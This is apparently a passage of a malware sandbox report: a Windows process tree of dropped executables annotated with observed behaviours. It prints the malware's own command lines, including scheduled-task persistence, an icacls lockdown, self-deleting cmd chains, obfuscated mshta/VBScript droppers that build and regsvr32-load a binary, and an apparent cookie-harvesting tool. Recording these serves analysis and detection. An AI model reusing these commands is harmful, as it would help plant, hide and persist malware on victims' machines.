                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  PID:4168
                                                                                                                                                                                  • C:\Windows\System32\schtasks.exe
                                                                                                                                                                                    "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 1 /tn "Videocard Service" /tr "C:\Users\Admin\AppData\Local\Temp\3EF.exe" /f
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                    PID:4792
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\70D.exe
                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\70D.exe
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  PID:992
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\C9C.exe
                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\C9C.exe
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  PID:5612
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\1315.exe
                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\1315.exe
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                  • Checks SCSI registry key(s)
                                                                                                                                                                                  PID:5212
                                                                                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                  1⤵
                                                                                                                                                                                    PID:5392
                                                                                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                                                                                    C:\Windows\explorer.exe
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:5052
                                                                                                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                      1⤵
                                                                                                                                                                                        PID:4296
                                                                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                                                                        C:\Windows\explorer.exe
                                                                                                                                                                                        1⤵
                                                                                                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                        PID:4016
                                                                                                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                        1⤵
                                                                                                                                                                                          PID:5712
                                                                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                                                                          C:\Windows\explorer.exe
                                                                                                                                                                                          1⤵
                                                                                                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                          PID:5336
                                                                                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:5244
                                                                                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                                                                                            C:\Windows\explorer.exe
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                            PID:4780
                                                                                                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                            1⤵
                                                                                                                                                                                              PID:5820
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\9381.exe
                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\9381.exe
                                                                                                                                                                                              1⤵
                                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                                              PID:3748
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\9381.exe
                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\9381.exe
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                • Adds Run key to start application
                                                                                                                                                                                                PID:5136
                                                                                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                  icacls "C:\Users\Admin\AppData\Local\41ae329f-496a-43fd-83c0-5cb13f0e943e" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                                  PID:4888
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\9381.exe
                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\9381.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                                                  PID:5404
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\9381.exe
                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\9381.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                      PID:4164
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\73d27362-8735-424f-9b69-706149e642e8\build2.exe
                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\73d27362-8735-424f-9b69-706149e642e8\build2.exe"
                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                                        PID:1544
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\73d27362-8735-424f-9b69-706149e642e8\build2.exe
                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\73d27362-8735-424f-9b69-706149e642e8\build2.exe"
                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                                                                          PID:2300
                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\73d27362-8735-424f-9b69-706149e642e8\build2.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                              PID:4280
                                                                                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                taskkill /im build2.exe /f
                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                                                PID:1540
                                                                                                                                                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                timeout /t 6
                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                                                                PID:4056
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\942E.exe
                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\942E.exe
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                  • Checks processor information in registry
                                                                                                                                                                                                  PID:6044
                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im 942E.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\942E.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                      PID:5824
                                                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                        taskkill /im 942E.exe /f
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                                        PID:2564
                                                                                                                                                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                        timeout /t 6
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                                                                                        PID:4632
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\96DE.exe
                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\96DE.exe
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                      PID:4476
                                                                                                                                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                        "C:\Windows\System32\mshta.exe" VbsCRIPt: Close ( CREATeObjECT( "wsCRIpT.ShElL" ). RUn ( "cmd.exe /Q /c tyPE ""C:\Users\Admin\AppData\Local\Temp\96DE.exe"" > wiZC_h7~B.eXE && STaRT wIZC_h7~B.eXe /PgRbPZTUXQ3fqTxJ5RJVzdoK5t & If """" == """" for %E in ( ""C:\Users\Admin\AppData\Local\Temp\96DE.exe"" ) do taskkill /Im ""%~nxE"" -F " , 0 , TRue ) )
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                          PID:4332
                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /Q /c tyPE "C:\Users\Admin\AppData\Local\Temp\96DE.exe" > wiZC_h7~B.eXE && STaRT wIZC_h7~B.eXe /PgRbPZTUXQ3fqTxJ5RJVzdoK5t & If "" == "" for %E in ( "C:\Users\Admin\AppData\Local\Temp\96DE.exe" ) do taskkill /Im "%~nxE" -F
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                              PID:5224
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\wiZC_h7~B.eXE
                                                                                                                                                                                                                wIZC_h7~B.eXe /PgRbPZTUXQ3fqTxJ5RJVzdoK5t
                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                  PID:4984
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                    "C:\Windows\System32\mshta.exe" VbsCRIPt: Close ( CREATeObjECT( "wsCRIpT.ShElL" ). RUn ( "cmd.exe /Q /c tyPE ""C:\Users\Admin\AppData\Local\Temp\wiZC_h7~B.eXE"" > wiZC_h7~B.eXE && STaRT wIZC_h7~B.eXe /PgRbPZTUXQ3fqTxJ5RJVzdoK5t & If ""/PgRbPZTUXQ3fqTxJ5RJVzdoK5t "" == """" for %E in ( ""C:\Users\Admin\AppData\Local\Temp\wiZC_h7~B.eXE"" ) do taskkill /Im ""%~nxE"" -F " , 0 , TRue ) )
                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                      PID:5632
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /Q /c tyPE "C:\Users\Admin\AppData\Local\Temp\wiZC_h7~B.eXE" > wiZC_h7~B.eXE && STaRT wIZC_h7~B.eXe /PgRbPZTUXQ3fqTxJ5RJVzdoK5t & If "/PgRbPZTUXQ3fqTxJ5RJVzdoK5t " == "" for %E in ( "C:\Users\Admin\AppData\Local\Temp\wiZC_h7~B.eXE" ) do taskkill /Im "%~nxE" -F
                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                          PID:5964
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                        "C:\Windows\System32\mshta.exe" VBScRIpt: clOSE ( CReatEObjecT ( "WSCRipt.ShElL" ). RUN ( "C:\Windows\system32\cmd.exe /q /C eCHO fx46oC:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Users\Admin\AppData\Local\Microsoft\WindowsApps;g9q> fHUZ28V.I0 & ECho | sET /p = ""MZ"" > PD~PO.Fu & Copy /y /B PD~PO.FU + 7KUTL.Vbk + FDiJ.1V + ShUJ.ChH +fHuZ28V.I0 m9HEkzA.2 & sTArT regsvr32.exe /U -S m9HEkZA.2 " , 0 , TrUE) )
                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                          PID:5200
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                        taskkill /Im "96DE.exe" -F
                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                                                        PID:6124
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\ECC0.exe
                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\ECC0.exe
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                                                                  PID:5032
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\EDF9.exe
                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\EDF9.exe
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                    PID:4740
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-OQNKO.tmp\EDF9.tmp
                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-OQNKO.tmp\EDF9.tmp" /SL5="$40384,172303,88576,C:\Users\Admin\AppData\Local\Temp\EDF9.exe"
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                      PID:5340
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-MFK46.tmp\èeèrgegdè_éçè_)))_.exe
                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-MFK46.tmp\èeèrgegdè_éçè_)))_.exe" /S /UID=rec7
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                        • Drops file in Drivers directory
                                                                                                                                                                                                                        • Adds Run key to start application
                                                                                                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                                                                                                        PID:4156
                                                                                                                                                                                                                        • C:\Program Files\temp_files\IFHBKYNQBM\irecord.exe
                                                                                                                                                                                                                          "C:\Program Files\temp_files\IFHBKYNQBM\irecord.exe" /VERYSILENT
                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                            PID:2648
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-FO545.tmp\irecord.tmp
                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-FO545.tmp\irecord.tmp" /SL5="$E032C,5808768,66560,C:\Program Files\temp_files\IFHBKYNQBM\irecord.exe" /VERYSILENT
                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                              • Drops file in Program Files directory
                                                                                                                                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                              PID:5664
                                                                                                                                                                                                                              • C:\Program Files (x86)\i-record\I-Record.exe
                                                                                                                                                                                                                                "C:\Program Files (x86)\i-record\I-Record.exe" -silent -desktopShortcut -programMenu
                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                PID:4240
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\1c-e42e6-823-018a6-9fc98f45d5b36\Daeshaxuxidu.exe
                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\1c-e42e6-823-018a6-9fc98f45d5b36\Daeshaxuxidu.exe"
                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                            • Checks computer location settings
                                                                                                                                                                                                                            PID:5192
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\35-0a9d7-0ee-eeca9-d4031d3b92794\Kokaqazhucy.exe
                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\35-0a9d7-0ee-eeca9-d4031d3b92794\Kokaqazhucy.exe"
                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                              PID:5408
                                                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\01k1vycr.yrg\GcleanerEU.exe /eufive & exit
                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                  PID:2156
                                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\va4iu400.fvv\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                    PID:4980
                                                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1mzfcnyc.2hb\Setup3310.exe /Verysilent /subid=623 & exit
                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                      PID:2020
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\1mzfcnyc.2hb\Setup3310.exe
                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\1mzfcnyc.2hb\Setup3310.exe /Verysilent /subid=623
                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                          PID:3748
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-0QP3K.tmp\Setup3310.tmp
                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-0QP3K.tmp\Setup3310.tmp" /SL5="$20422,138429,56832,C:\Users\Admin\AppData\Local\Temp\1mzfcnyc.2hb\Setup3310.exe" /Verysilent /subid=623
                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                            PID:5660
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-NP61E.tmp\Setup.exe
                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-NP61E.tmp\Setup.exe" /Verysilent
                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                PID:3964
                                                                                                                                                                                                                                                • C:\Program Files (x86)\Data Finder\Versium Research\MediaBurner.exe
                                                                                                                                                                                                                                                  "C:\Program Files (x86)\Data Finder\Versium Research\MediaBurner.exe"
                                                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                                                    PID:4488
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-LNHAK.tmp\MediaBurner.tmp
                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-LNHAK.tmp\MediaBurner.tmp" /SL5="$304D2,303887,220160,C:\Program Files (x86)\Data Finder\Versium Research\MediaBurner.exe"
                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                        PID:988
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-O81BF.tmp\_____________bob.exe
                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-O81BF.tmp\_____________bob.exe" /S /UID=burnerch1
                                                                                                                                                                                                                                                          11⤵
                                                                                                                                                                                                                                                            PID:2812
                                                                                                                                                                                                                                                            • C:\Program Files\Windows Photo Viewer\XDWATXLRBN\ultramediaburner.exe
                                                                                                                                                                                                                                                              "C:\Program Files\Windows Photo Viewer\XDWATXLRBN\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                                                                                                                              12⤵
                                                                                                                                                                                                                                                                PID:3460
                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-7G432.tmp\ultramediaburner.tmp
                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-7G432.tmp\ultramediaburner.tmp" /SL5="$30512,281924,62464,C:\Program Files\Windows Photo Viewer\XDWATXLRBN\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                                                                                                                                  13⤵
                                                                                                                                                                                                                                                                    PID:6736
                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                                                                                                                                                      "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                                                                                                                                                                                                                      14⤵
                                                                                                                                                                                                                                                                        PID:5600
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\58-c154a-67a-7c89a-ec5e67faa3cf1\Faronozhudae.exe
                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\58-c154a-67a-7c89a-ec5e67faa3cf1\Faronozhudae.exe"
                                                                                                                                                                                                                                                                    12⤵
                                                                                                                                                                                                                                                                      PID:6740
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\82-0eb6c-87f-c3382-6569f03c35e68\Baxaeboqoxi.exe
                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\82-0eb6c-87f-c3382-6569f03c35e68\Baxaeboqoxi.exe"
                                                                                                                                                                                                                                                                      12⤵
                                                                                                                                                                                                                                                                        PID:5904
                                                                                                                                                                                                                                                                • C:\Program Files (x86)\Data Finder\Versium Research\NMemo3Setp.exe
                                                                                                                                                                                                                                                                  "C:\Program Files (x86)\Data Finder\Versium Research\NMemo3Setp.exe"
                                                                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                                                                    PID:3648
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\8023222.exe
                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\8023222.exe"
                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                        PID:4192
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\8555296.exe
                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\8555296.exe"
                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                        PID:1044
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\1419132.exe
                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\1419132.exe"
                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                          PID:5184
                                                                                                                                                                                                                                                                      • C:\Program Files (x86)\Data Finder\Versium Research\RunWW.exe
                                                                                                                                                                                                                                                                        "C:\Program Files (x86)\Data Finder\Versium Research\RunWW.exe"
                                                                                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                                                                                          PID:5168
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c taskkill /im RunWW.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\Data Finder\Versium Research\RunWW.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                              PID:2288
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                taskkill /im RunWW.exe /f
                                                                                                                                                                                                                                                                                11⤵
                                                                                                                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                                                                                                                PID:4860
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                timeout /t 6
                                                                                                                                                                                                                                                                                11⤵
                                                                                                                                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                PID:7236
                                                                                                                                                                                                                                                                          • C:\Program Files (x86)\Data Finder\Versium Research\hjjgaa.exe
                                                                                                                                                                                                                                                                            "C:\Program Files (x86)\Data Finder\Versium Research\hjjgaa.exe"
                                                                                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                                                                                              PID:2272
                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                  PID:5800
                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                    PID:6484
                                                                                                                                                                                                                                                                                • C:\Program Files (x86)\Data Finder\Versium Research\app.exe
                                                                                                                                                                                                                                                                                  "C:\Program Files (x86)\Data Finder\Versium Research\app.exe"
                                                                                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                                                                                    PID:4048
                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\Data Finder\Versium Research\guihuali-game.exe
                                                                                                                                                                                                                                                                                    "C:\Program Files (x86)\Data Finder\Versium Research\guihuali-game.exe"
                                                                                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                                                                                      PID:1720
                                                                                                                                                                                                                                                                                      • C:\Program Files (x86)\Data Finder\Versium Research\guihuali-game.exe
                                                                                                                                                                                                                                                                                        "C:\Program Files (x86)\Data Finder\Versium Research\guihuali-game.exe" -a
                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                          PID:5560
                                                                                                                                                                                                                                                                                      • C:\Program Files (x86)\Data Finder\Versium Research\LabPicV3.exe
                                                                                                                                                                                                                                                                                        "C:\Program Files (x86)\Data Finder\Versium Research\LabPicV3.exe"
                                                                                                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                                                                                                          PID:2040
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-JVPA7.tmp\LabPicV3.tmp
                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-JVPA7.tmp\LabPicV3.tmp" /SL5="$304B0,506127,422400,C:\Program Files (x86)\Data Finder\Versium Research\LabPicV3.exe"
                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                              PID:5920
                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-O81BG.tmp\12(((((.exe
                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-O81BG.tmp\12(((((.exe" /S /UID=lab214
                                                                                                                                                                                                                                                                                                11⤵
                                                                                                                                                                                                                                                                                                  PID:6548
                                                                                                                                                                                                                                                                                                  • C:\Program Files\Reference Assemblies\CAINRKABGI\prolab.exe
                                                                                                                                                                                                                                                                                                    "C:\Program Files\Reference Assemblies\CAINRKABGI\prolab.exe" /VERYSILENT
                                                                                                                                                                                                                                                                                                    12⤵
                                                                                                                                                                                                                                                                                                      PID:7368
                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-CQA5J.tmp\prolab.tmp
                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-CQA5J.tmp\prolab.tmp" /SL5="$2063C,575243,216576,C:\Program Files\Reference Assemblies\CAINRKABGI\prolab.exe" /VERYSILENT
                                                                                                                                                                                                                                                                                                        13⤵
                                                                                                                                                                                                                                                                                                          PID:7404
                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\2d-f046d-bd9-465b5-350e5deefc33d\Byzhyqahaevi.exe
                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\2d-f046d-bd9-465b5-350e5deefc33d\Byzhyqahaevi.exe"
                                                                                                                                                                                                                                                                                                        12⤵
                                                                                                                                                                                                                                                                                                          PID:7480
                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\6e-4caa1-90c-b088a-97db5a07f0d36\Lufupibyci.exe
                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\6e-4caa1-90c-b088a-97db5a07f0d36\Lufupibyci.exe"
                                                                                                                                                                                                                                                                                                          12⤵
                                                                                                                                                                                                                                                                                                            PID:7520
                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\Data Finder\Versium Research\lylal220.exe
                                                                                                                                                                                                                                                                                                      "C:\Program Files (x86)\Data Finder\Versium Research\lylal220.exe"
                                                                                                                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                                                                                                                        PID:4900
                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-3TL66.tmp\lylal220.tmp
                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-3TL66.tmp\lylal220.tmp" /SL5="$204BA,172303,88576,C:\Program Files (x86)\Data Finder\Versium Research\lylal220.exe"
                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                            PID:4464
                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-2K6U1.tmp\èeèrgegdè_éçè_)))_.exe
                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-2K6U1.tmp\èeèrgegdè_éçè_)))_.exe" /S /UID=lylal220
                                                                                                                                                                                                                                                                                                              11⤵
                                                                                                                                                                                                                                                                                                                PID:5720
                                                                                                                                                                                                                                                                                                                • C:\Program Files\Internet Explorer\MOVVHJIZJL\irecord.exe
                                                                                                                                                                                                                                                                                                                  "C:\Program Files\Internet Explorer\MOVVHJIZJL\irecord.exe" /VERYSILENT
                                                                                                                                                                                                                                                                                                                  12⤵
                                                                                                                                                                                                                                                                                                                    PID:6228
                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-MMC6S.tmp\irecord.tmp
                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-MMC6S.tmp\irecord.tmp" /SL5="$10534,5808768,66560,C:\Program Files\Internet Explorer\MOVVHJIZJL\irecord.exe" /VERYSILENT
                                                                                                                                                                                                                                                                                                                      13⤵
                                                                                                                                                                                                                                                                                                                        PID:6520
                                                                                                                                                                                                                                                                                                                        • C:\Program Files (x86)\i-record\I-Record.exe
                                                                                                                                                                                                                                                                                                                          "C:\Program Files (x86)\i-record\I-Record.exe" -silent -desktopShortcut -programMenu
                                                                                                                                                                                                                                                                                                                          14⤵
                                                                                                                                                                                                                                                                                                                            PID:7728
